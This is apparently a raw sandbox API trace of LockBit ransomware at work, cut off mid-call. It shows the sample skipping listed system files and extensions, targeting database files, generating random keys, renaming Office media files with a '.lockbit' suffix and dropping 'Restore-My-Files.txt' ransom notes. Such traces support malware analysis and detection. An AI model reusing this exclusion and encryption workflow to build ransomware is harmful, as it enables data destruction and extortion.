lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.374] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.374] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.374] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.375] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.375] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.375] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14757_.GIF") returned 1 [0203.375] lstrcmpiW (lpString1="ntldr", lpString2="BD14757_.GIF") returned 1 [0203.375] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14757_.GIF") returned 1 [0203.375] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14757_.GIF") returned 1 [0203.375] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14757_.GIF") returned -1 [0203.375] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14757_.GIF") returned 1 [0203.375] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14757_.GIF") returned 1 [0203.375] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.375] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14757_.GIF") returned=".GIF" [0203.375] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.375] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.375] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.375] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.376] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.376] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.376] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.376] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.376] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.376] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.376] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.376] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.376] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.376] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.376] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.376] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.376] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.376] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.376] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.376] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.376] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.376] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.376] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.376] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.376] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.376] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.376] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.376] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14757_.GIF.lockbit") returned 78 [0203.376] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14757_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14757_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.377] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.377] malloc (_Size=0x40068) returned 0x3df0008 [0203.377] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=179) returned 1 [0203.377] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.378] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.378] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.378] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.378] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.382] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14757_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14757_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.382] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.382] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.382] free (_Block=0x1fa2ed8) [0203.382] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14757_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.382] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.382] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.382] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfafa9d00, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc9c4720, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xfafa9d00, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0x111, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14790_.GIF", cAlternateFileName="")) returned 1 [0203.382] lstrcmpiW (lpString1=".", lpString2="BD14790_.GIF") returned -1 [0203.382] lstrcmpiW (lpString1="..", lpString2="BD14790_.GIF") returned -1 [0203.382] PathFindExtensionW (pszPath="BD14790_.GIF") returned=".GIF" [0203.382] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.382] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.382] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.382] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.382] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.382] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.382] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.382] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.382] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.382] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.382] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.382] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.382] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.382] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.382] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.383] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.383] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.383] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.383] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.383] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.383] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.383] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.384] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.384] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.384] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14790_.GIF") returned 1 [0203.384] lstrcmpiW (lpString1="ntldr", lpString2="BD14790_.GIF") returned 1 [0203.384] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14790_.GIF") returned 1 [0203.384] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14790_.GIF") returned 1 [0203.384] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14790_.GIF") returned -1 [0203.384] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14790_.GIF") returned 1 [0203.384] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14790_.GIF") returned 1 [0203.384] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.384] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14790_.GIF") returned=".GIF" [0203.384] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.384] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.384] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.384] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.384] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.384] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.384] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.384] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.384] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.384] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.384] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.384] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.384] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.384] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.384] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.384] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.384] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.384] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.384] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.384] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.384] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.384] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.384] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.385] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.385] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.385] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.385] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.385] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.385] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14790_.GIF.lockbit") returned 78 [0203.385] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14790_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14790_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.386] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.387] malloc (_Size=0x40068) returned 0x3df0008 [0203.387] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=273) returned 1 [0203.387] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.387] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.387] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.387] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.387] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.390] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14790_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14790_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.390] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.390] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.390] free (_Block=0x1fa2ed8) [0203.390] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14790_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.390] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.390] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.390] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfafa9d00, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc9c4720, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xfafa9d00, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14791_.GIF", cAlternateFileName="")) returned 1 [0203.390] lstrcmpiW (lpString1=".", lpString2="BD14791_.GIF") returned -1 [0203.390] lstrcmpiW (lpString1="..", lpString2="BD14791_.GIF") returned -1 [0203.390] PathFindExtensionW (pszPath="BD14791_.GIF") returned=".GIF" [0203.390] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.390] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.390] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.390] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.390] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.390] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.390] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.390] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.390] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.391] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.391] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.391] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.391] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.391] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.391] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.391] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.391] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.391] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.391] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.392] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.392] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.392] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14791_.GIF") returned 1 [0203.392] lstrcmpiW (lpString1="ntldr", lpString2="BD14791_.GIF") returned 1 [0203.392] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14791_.GIF") returned 1 [0203.392] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14791_.GIF") returned 1 [0203.392] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14791_.GIF") returned -1 [0203.392] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14791_.GIF") returned 1 [0203.392] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14791_.GIF") returned 1 [0203.392] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.392] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14791_.GIF") returned=".GIF" [0203.392] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.392] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.392] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.392] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.392] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.392] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.392] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.392] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.392] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.392] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.392] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.392] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.392] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.392] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.392] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.392] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.392] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.392] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.392] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.392] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.392] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.392] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.392] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.392] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.392] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.393] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.393] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.393] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.393] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14791_.GIF.lockbit") returned 78 [0203.393] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14791_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14791_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.394] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.394] malloc (_Size=0x40068) returned 0x3df0008 [0203.394] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1115) returned 1 [0203.394] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.394] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.394] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.395] GetProcAddress 